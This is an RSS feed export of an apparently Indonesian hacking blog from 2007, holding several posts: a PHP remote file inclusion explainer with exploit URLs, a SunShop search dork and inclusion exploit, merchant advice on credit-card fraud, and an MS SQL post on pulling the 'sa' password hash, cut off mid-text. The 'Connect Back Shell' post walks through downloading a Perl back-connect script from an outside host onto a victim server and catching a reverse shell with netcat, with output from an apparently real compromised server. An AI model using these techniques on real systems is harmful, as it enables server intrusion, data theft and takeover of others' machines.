src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=28&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/21/carding-tutorial-serta-bug-online-store-ini-sebuah-artikel/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
		<item>
		<title>PHP Injection</title>
		<link>http://addrsinfo.wordpress.com/2007/04/17/php-injection/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/17/php-injection/#comments</comments>
		<pubDate>Tue, 17 Apr 2007 14:11:13 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/17/php-injection/</guid>
		<description><![CDATA[PRAKATA ——-Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=27&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><font face="Courier New">PRAKATA<br />
——-</font><font face="Courier New">Remote file inclusion dapat diartikan sebagai penyisipan sebuah file dari luar suatu file dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.</font></p>
<p><font face="Courier New">Dalam artikel ini kita akan lebih banyak membahas bagaimana proses file inclusion (yang selanjutnya kita sebut dengan istilah ‘injeksi’) bisa terjadi dalam bahasa PHP.</font></p>
<p><font face="Courier New">° BAGAIMANA BISA TERJADI?<br />
———————–</font></p>
<p><font face="Courier New">Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:</font></p>
<p><font face="Courier New">1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)</font></p>
<p><font face="Courier New">Variabel dalam PHP mempunyai sintaks:</font></p>
<p><font face="Courier New">#1 include ($namavariable. “/file…”)<br />
#2 require_once ($namavariable. /file…)<br />
#3 include_once ($variable. /file…)</font></p>
<p><font face="Courier New">Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat  variabel seperti ini:</font></p>
<p><font face="Courier New">…<br />
include($my_ms[”root”].’/error.php’);<br />
…</font></p>
<p><font face="Courier New">Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver  dengan eksploit script injeksi PHP:</font></p>
<p><font face="Courier New">http://www.target.com/[Script Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?</font></p>
<p><font face="Courier New">Diatas adalah contoh eksploitasi MySpeach &lt; = v3.0.2 (my_ms[root])</font></p>
<p><font face="Courier New">2. Setting dalam file PHP.ini</font></p>
<p><font face="Courier New">#1. register_globals=On<br />
#2. magic_quotes=off<br />
#3. allow_fopenurl=on</font></p>
<p><font face="Courier New">° BERBAHAYAKAH?<br />
&#8212;&#8212;&#8212;&#8212;-</font></p>
<p><font face="Courier New">File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.</font></p>
<p><font face="Courier New">Secara garis besar resiko serangan ini adalah:</font></p>
<p><font face="Courier New">1. Web root folder / subdirectory defacing.<br />
2. Previledge escalation (mendapatkan hak akses lebih tinggi).<br />
3. Menjalankan proses dalam server (psyBNC, bots, dsb)<br />
4. Pilfering a.k.a pencurian data (such as credentials information, credit  cards, etc..)<br />
5. Dan banyak lagi&#8230;!!! Termasuk tindakan pengambilalihan server dan ddos! <img src="http://sanyasyari.com/wp-includes/images/smilies/icon_wink.gif" alt=";)" class="wp-smiley" /> </font></p>
<p><font face="Courier New">° SISTEM OPERASI APA YANG KEBAL?<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;</font></p>
<p><font face="Courier New">Saya teringat permainan C&amp;C Generals (my fave game!) saat seorang hacker keluar dari barak. Mereka mengucapkan &#8220;NO SYSTEMS IS SAFE!&#8221;. Tepat sekali! Tidak ada sistem operasi yang aman dari serangan injeksi selama mereka menggunakan server side scripting yang dapat dieksploitasi, tak peduli apakah itu Microsoft Windows, LINUX, FreeBSD, Solaris, Darwin OS, dan lain-lainnya.</font></p>
<p><font face="Courier New">° APA YANG HARUS DILAKUKAN?<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-</font></p>
<p><font face="Courier New">Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.</font></p>
<p><font face="Courier New">Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal. Gunakan firewall guna mencegah penyusupan orang-orang yang tidak bertanggung jawab dan memperhatikan port-port server yang sedang terbuka.</font></p>
<p><font face="Courier New">° ENDING</font></p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/27/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/27/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/27/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/27/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/27/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=27&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/17/php-injection/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>

		<media:content url="http://sanyasyari.com/wp-includes/images/smilies/icon_wink.gif" medium="image">
			<media:title type="html">;)</media:title>
		</media:content>
	</item>
		<item>
		<title>BUG SUN SHOP</title>
		<link>http://addrsinfo.wordpress.com/2007/04/17/bug-sun-shop/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/17/bug-sun-shop/#comments</comments>
		<pubDate>Tue, 17 Apr 2007 13:56:48 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/17/bug-sun-shop/</guid>
		<description><![CDATA[# dork : &#8220;powered by sunshop&#8221; &#62; &#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212; &#62; bug found: &#62; &#62; Exploit: www.target.com/ index.php? abs_path= [evilcode] &#62; www.target.com/ checkout. php?abs_path= [evilcode] &#62;<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=26&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p># dork          : &#8220;powered by sunshop&#8221;<br />
&gt; &#8212;&#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;&#8212; &#8212;&#8212;<br />
&gt; bug found:<br />
&gt;<br />
&gt; Exploit: www.target.com/ index.php? abs_path= [evilcode]<br />
&gt;          www.target.com/ checkout. php?abs_path= [evilcode]<br />
&gt;</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/26/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/26/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/26/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/26/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/26/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=26&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/17/bug-sun-shop/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
		<item>
		<title>Jualan online di Internet dengan pembayaran kartu kredit</title>
		<link>http://addrsinfo.wordpress.com/2007/04/16/jualan-online-di-internet-dengan-pembayaran-kartu-kredit/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/16/jualan-online-di-internet-dengan-pembayaran-kartu-kredit/#comments</comments>
		<pubDate>Mon, 16 Apr 2007 16:46:18 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/16/jualan-online-di-internet-dengan-pembayaran-kartu-kredit/</guid>
		<description><![CDATA[Cukup banyak calon pedagang online di Indonesia yang menanyakan saya, bagaimana cara mengurus pembayaran online agar bisa jualan di Internet. Banyak 3rd party untuk credit card payment gateway via internet. Tapi untuk di Indonesia masih sedikit, dan kebanyakan terus tidak bisa berjalan. Contoh www.commerce.net.id atau www.cipas.com (Cipas sebetulnya perusahaan Malaysia kalau tidak salah, tapi memiliki [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=25&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Cukup banyak calon pedagang online di Indonesia yang menanyakan saya, bagaimana cara mengurus pembayaran online agar bisa jualan di Internet.</p>
<p>Banyak 3rd party untuk credit card payment gateway via internet. Tapi untuk di Indonesia masih sedikit, dan kebanyakan terus tidak bisa berjalan. Contoh <a href="http://www.commerce.net.id/">www.commerce.net.id</a> atau <a href="http://www.cipas.com/">www.cipas.com</a> (Cipas sebetulnya perusahaan Malaysia kalau tidak salah, tapi memiliki kantor di Indonesia). Dulu BII juga menyediakan jasa ini. Ada beberapa yang lain, tapi saya sendiri kurang tahu.</p>
<p>Jadi pemilihan 3rd party terpaksa harus anda lakukan dengan pihak yang ada di luar negeri. Sebaiknya mungkin anda cari yang sudah bekerja sama atau dipercaya oleh Verisign misalnya. Agak repot emang urusan yang satu ini.</p>
<p>Kesulitan lain yang mungkin terjadi, anda sudah harus mempunyai aplikasi online (shopping cart) yang kemudian akan dihubungkan dengan sistem paymetn gateway mereka. Jadi anda harus bekerja sama dengan pembuat web anda, dan memberikan object yang diberikan oleh 3rd party ini. (Oh ya, merchant tidak diperbolehkan menyimpan data credit card lho). Sebaiknya anda juga menggunakan jasa konsultan pembuatan web yang baik. Kalau menggunakan pembuat web yang ‘asal’, kemungkinan anda malah enggak punya shopping cart yang memadai.</p>
<p>Begitu website dengan shopping cart anda selesai, kemudian menempelkan object code yang diberikan si penyedia jasa pembayaran, anda sudah bisa jualan ke se antero dunia. Selesai?</p>
<p><strong>Resiko berjualan dengan pembayaran Credit Card</strong></p>
<p>Ternyata tidak semudah yang dibayangkan. Tingkat fraud credit card masih tinggi. Anda harus bersiap-siap menanggung kerugian apabila si pembeli menggunakan credit card secara illegal. Penyedia jasa pembayaran tidak akan membayar anda jika hal ini terjadi. Sederhananya, andalah yang menanggung akibatnya jika terjadi apa-apa dengan kartu kredit ini. Adil? Tapi inilah syarat yang diberikan oleh penyedia jasa pembayaran.</p>
<p>Inilah bagian terberat menjadi merchant online. Kalau anda hanya menjual jasa layanan seperti hosting, mungkin anda hanya tinggal memutuskan jasa layanan anda. Tapi kalau berupa produk, dimana anda harus bermodal dulu?</p>
<p>Ada beberapa tips untuk menghindari fraud credit card bagi anda yang sudah menjadi merchant online:</p>
<ul>
<li>Beberapa negara di dunia sudah di ‘black list’ karena sering terjadi fraud, seperti: Africa, Rumania, Nigeria, Malaysia, Slovenia dan Indonesia!. Artinya kalau anda pemegang kartu kredit Indonesia, jangan harap kartu anda bisa untuk membeli barang online. Jadi kalau anda sebagai merchant ragu … jangan dikirim.</li>
<li>Pembeli beralamatkan di Thailand, misalnya, tapi menggunakan kartu kredit USA, ini juga harus dicurigai.</li>
<li>Walaupun sudah di blacklist atau enggak bisa pesan online, Carder (istilah untuk pengguna kartu kredit illegal) Indonesia sering mengakali dengan cara lain. Mereka bisa menelepon anda, kemudian memesan via telepon/fax, dan memberikan data kartu kredit mereka. Sebaiknya ini juga jangan di percaya. Bahkan jika mereka bisa membuktikan dapat memberikan laporan pembayaran kartu kredit selama 3 bulan terakhir. Ada baiknya konfirmasi ke bank yang memberikan kartu kredit, dan minta bank untuk memberitahu pelanggannya bahwa ada transaksi ke anda. Jika pihak Bank kemudian memberitahukan bahwa kartu kredit tersebut tidak digunakan, maka batalkan saja.</li>
<li>Dan masih banyak cara-cara jahat lainnya yang masih belum saya tahu. Jika anda tahu, mohon beritahu saya juga.</li>
</ul>
<p>VISA dan Mastercard sedang mengupayakan agar transaksi online di internet harus menggunakan nomor pin yang dapat diubah-ubah oleh pemiliknya. Mudah-mudahan langkah ini dapat menjadikan eCommerce di Internet lebih baik dan menghilangkan citra buruk di masa lampau. Sayangnya, si pemilik harus mau berepot-repot ria mendaftarkan diri ke bank yang mengeluarkan kartu. Ini mengurangi kesempatan orang untuk berbelanja online.</p>
<p>Terakhir saran saya, kalau bisa, cari penyedia jasa Payment Gateway yang sudah menggunakan ini. Mudah-mudahan anda sebagai merchant akan terlindungi.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/25/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/25/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/25/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/25/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/25/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=25&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/16/jualan-online-di-internet-dengan-pembayaran-kartu-kredit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>
	</item>
		<item>
		<title>Connect Back Shell</title>
		<link>http://addrsinfo.wordpress.com/2007/04/16/connect-back-shell/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/16/connect-back-shell/#comments</comments>
		<pubDate>Mon, 16 Apr 2007 16:34:13 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/16/connect-back-shell/</guid>
		<description><![CDATA[aku gak pernah gagal kok klo pake tools yang di r57 gagal aku biasanya pake script connect back yang ada di site om solpot yaitu http://solpotcrew.org/xpl/back.txt taru script itu di server target gak di mana aja terserah yang penting drwxrwxrwx hehecara gunainnya perl back.txt ipkamu portyang dibuka &#62;&#62; pasangan serasinya nc cth: di pc kamu [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=24&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>aku gak pernah gagal kok<br />
klo pake tools yang di r57 gagal aku biasanya pake script connect back yang ada di site om solpot yaitu <a href="http://solpotcrew.org/xpl/back.txt" target="_blank">http://solpotcrew.org/xpl/back.txt</a></p>
<p>taru script itu di server target gak di mana aja terserah yang penting drwxrwxrwx hehecara gunainnya</p>
<p>perl back.txt ipkamu portyang dibuka &gt;&gt; pasangan serasinya nc<br />
cth:<br />
di pc kamu jalankan dengan syarat pc kamu memilikin ip public<br />
sh-2.05b$ ./nc -l -v -p 2500 &gt;&gt; klo kamu pake *nix<br />
./nc -l -v -p 2500<br />
listening on [any] 2500 &#8230;</p>
<p>D:\Hacking\backdoor&gt;nc.exe -l -v -p 2500 &gt;&gt; klo kamu pake windows<br />
listening on [any] 2500 &#8230;</p>
<p>nc for windows or *nix bisa di download di solpotcrew.org/xpl/ &gt;&gt;&gt; disini cari ya</p>
<p>trus kita jalankan back.txt di mesin target lewat php sheell aja</p>
<p>perintahnya<br />
perl back.txt 202.xxx.xxx.xxx 2500<br />
knapa 2500 &gt;&gt; karena tadi kita membuka port 2500 pake nc ini terserah kamu</p>
<p>contoh nyata:<br />
aku jalankan nc di server yang udah di pasang bind dan gw bisa make server itu or pc kamu sendiri<br />
sh-2.05b$ ./nc -l -v -p 2500<br />
./nc -l -v -p 2500<br />
listening on [any] 2500 &#8230;<br />
cukup sampe sini yang kita lakukan di pc kita</p>
<p>aku pake konect back dan jalankan perintah sbb:(perintah2 dibawah ini saya jalankan di mesin target lewat php shell)</p>
<p>lwp-download <a href="http://home-edition2001.org/xpl/back.txt" target="_blank">http://home-edition2001.org/xpl/back.txt</a> &gt;&gt; mengambil file script back.txt<br />
Saving to &#8216;back.txt&#8217;&#8230; 1.18 KB received<br />
cara penggunaannya:<br />
perl back.txt 213.203.223.43 2500 &gt;&gt; 213.203.223.43 ip kita<br />
tekan enter aja</p>
<p>liat di nc kamu ini perubahannya:<br />
sh-2.05b$ ./nc -l -v -p 2500<br />
./nc -l -v -p 2500<br />
listening on [any] 2500 &#8230;<br />
connect to [213.203.223.43] from 2.67.5746.static.theplanet.com [70.87.103.2] 4473<br />
SoLpOt NuMpAnG LeWaT <img src="http://echo.or.id/forum/images/smiles/icon_biggrin.gif" alt="Very Happy" border="0" /><br />
We ArE JuSt A LiTtLe ChiLd</p>
<p>FreeBSD server3.nusantaraonline.info 4.11-RELEASE FreeBSD 4.11-RELEASE #1: Fri Dec 16 07:45:43 WIT 2005     <a href="mailto:root@server3.nusantaraonline.info">root@server3.nusantaraonline.info</a>:/usr/src/sys/compile/nusantaraonline  i386<br />
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)</p>
<p>kamu sekarang berhasil melakukan conect back selamat ya heheh</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/addrsinfo.wordpress.com/24/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/addrsinfo.wordpress.com/24/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/addrsinfo.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/addrsinfo.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/addrsinfo.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/addrsinfo.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/addrsinfo.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/addrsinfo.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/addrsinfo.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/addrsinfo.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/addrsinfo.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/addrsinfo.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/addrsinfo.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/addrsinfo.wordpress.com/24/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/addrsinfo.wordpress.com/24/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/addrsinfo.wordpress.com/24/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=24&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://addrsinfo.wordpress.com/2007/04/16/connect-back-shell/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db8346bb1427a63cb61ab484993c9997?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">addrsinfo</media:title>
		</media:content>

		<media:content url="http://echo.or.id/forum/images/smiles/icon_biggrin.gif" medium="image">
			<media:title type="html">Very Happy</media:title>
		</media:content>
	</item>
		<item>
		<title>Microsoft SQL Server Hacking</title>
		<link>http://addrsinfo.wordpress.com/2007/04/16/microsoft-sql-server-hacking/</link>
		<comments>http://addrsinfo.wordpress.com/2007/04/16/microsoft-sql-server-hacking/#comments</comments>
		<pubDate>Mon, 16 Apr 2007 16:33:19 +0000</pubDate>
		<dc:creator>addrsinfo</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://addrsinfo.wordpress.com/2007/04/16/microsoft-sql-server-hacking/</guid>
		<description><![CDATA[Microsoft SQL Server Hacking &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;- . Gunakan SQL Quary Analyzer (Paket ini biasanya sudah ada jika Anda mengintall Ms. SQL Server) atau Anda juga bisa memanfaatkan paket lain seperti Handy SQL. . Jalan perintah Query sbb : &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; select password from master.dbo.sysxlogins where name=&#8217;sa&#8217; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; . Anda akan mendapatkan hash &#8216;sa&#8217; sebagai berikut : 0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=addrsinfo.wordpress.com&amp;blog=988827&amp;post=23&amp;subd=addrsinfo&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Microsoft SQL Server Hacking<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<br />
. Gunakan SQL Quary Analyzer (Paket ini biasanya sudah ada jika Anda mengintall Ms. SQL Server) atau<br />
Anda juga bisa memanfaatkan paket lain seperti Handy SQL.<br />
. Jalan perintah Query sbb :</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
select password from master.dbo.sysxlogins where name=&#8217;sa&#8217;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>. Anda akan mendapatkan hash &#8216;sa&#8217; sebagai berikut :<br />
0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA5449E6F649BA954AFF4057056D9B</p>
<p>ingat : ini adalah hash utk &#8216;sa&#8217; di PC saya.</p>
<p>. Mari kita gunakan &#8216;clear hashsing&#8217;</p>
<p>0&#215;0100                                                                    &#8212;&#8211;&gt; constant header<br />
